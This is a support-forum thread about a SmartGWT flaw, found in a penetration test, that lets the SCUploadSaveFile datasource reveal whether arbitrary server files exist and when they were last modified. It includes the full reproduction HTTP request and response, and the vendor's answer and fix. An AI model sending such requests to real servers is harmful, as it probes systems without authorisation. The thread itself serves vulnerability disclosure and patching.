Announcement

Collapse
No announcement yet.
X
  • Filter
  • Time
Clear All
new posts

    SCUploadSaveFile datasource can be abused to check arbitrary server file existence

    Hello, we recently had a 3rd party do a penetration test of our application, and they discovered that a fetch operation against the SCUploadSaveFile datasource can be manipulated such that it returns the last modified timestamp of any modified file on the server. Since I don't use this feature of SmartGWT, is it possible to turn this off? I've noticed that this is part of the "system" data sources, and I'd prefer not to override those. The vulnerability can be reproduced with the following HTTP request.

    In this example, my WAR file is someWar, and my GWT app name is someApp(thus the URL/someWar/someApp). IF C:\testFile.xml exists, it will return the modification time for that file. Framework versions are GWT 2.6.0 and SmartGWT-EE 4.1-2016-01-31:


    POST to path /someWar/someApp/sc/IDACall?isc_rpc=1&isc_v=v9.1p_2016-0131&isc_xhr=1

    Request content
    Code:
    isc_tnum=36
    _transaction=<?xml version="1.0"?>  
    <transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchemainstance" xsi:type="xsd:Object">      
       <transactionNum xsi:type="xsd:long">5</transactionNum>      
          <operations xsi:type="xsd:List">          
             <elem xsi:type="xsd:Object">      
                 <criteria>    
                    <path>c:\testFile.xml</path>      
               </criteria>              
               <appID>builtinApplication</appID>            
               <operation>SCUploadSaveFile_fetch</operation>          
           </elem>      
          </operations>  
    </transaction>  
    protocolVersion=1.0

    #2
    You should find that you cannot call this method unless the built-in RPC method "loadFile" is also enabled. "loadFile" is not enabled by default - see your server.properties file, in particular the setting RPCManager.enabledBuiltinMethods and documentation provided right next to this setting.

    If you've overridden the default and turned on the "loadFile" Built-in RPC, your deployment is indeed vulnerable, and not just to checking timestamps - "loadFile" can be used to load the actual content of arbitrary files. We would recommend reverting to the default settings the product ships with.

    See also the Tools Deployment topic for how to safely enable RPCs such as "loadFile", only for admin users.

    Comment


      #3
      Yeah I saw that setting, and tried it with both
      RPCManager.enabledBuiltinMethods:
      and
      RPCManager.enabledBuiltinMethods: false
      assuming I don't understand how to use it. Either way, calling this method returns the following:
      //isc_RPCResponseStart-->[{affectedRows:0,data:{lastChangeDate:1421989076000},invalidateCache:false,isDSResponse:true,operationType:"fetch",queueStatus:0,status:0}]//isc_RPCResponseEnd

      That "lastChangeDate" does actually line up with the last modified date on one of my system files.

      Comment


        #4
        The enabledBuiltinMethods setting actually only controls SCUploadSaveFile from version 5.0 onward. We're checking on the appropriate setting in the older 4.1 version. In the meantime, removing the .ds.xml file from your production deployment would solve the problem - the operations provided by SCUploadSaveFile are only used by Visual Builder and Reify.

        Comment


          #5
          We've made a change to address this issue in the 4.1 version. Now, disabling "loadFile" also disables SCUploadSaveFile "fetch".
          Please try the next nightly build, dated February 10.

          Regards
          Isomorphic Software

          Comment


            #6
            Fantastic, thank you!

            Comment

            Working...
            X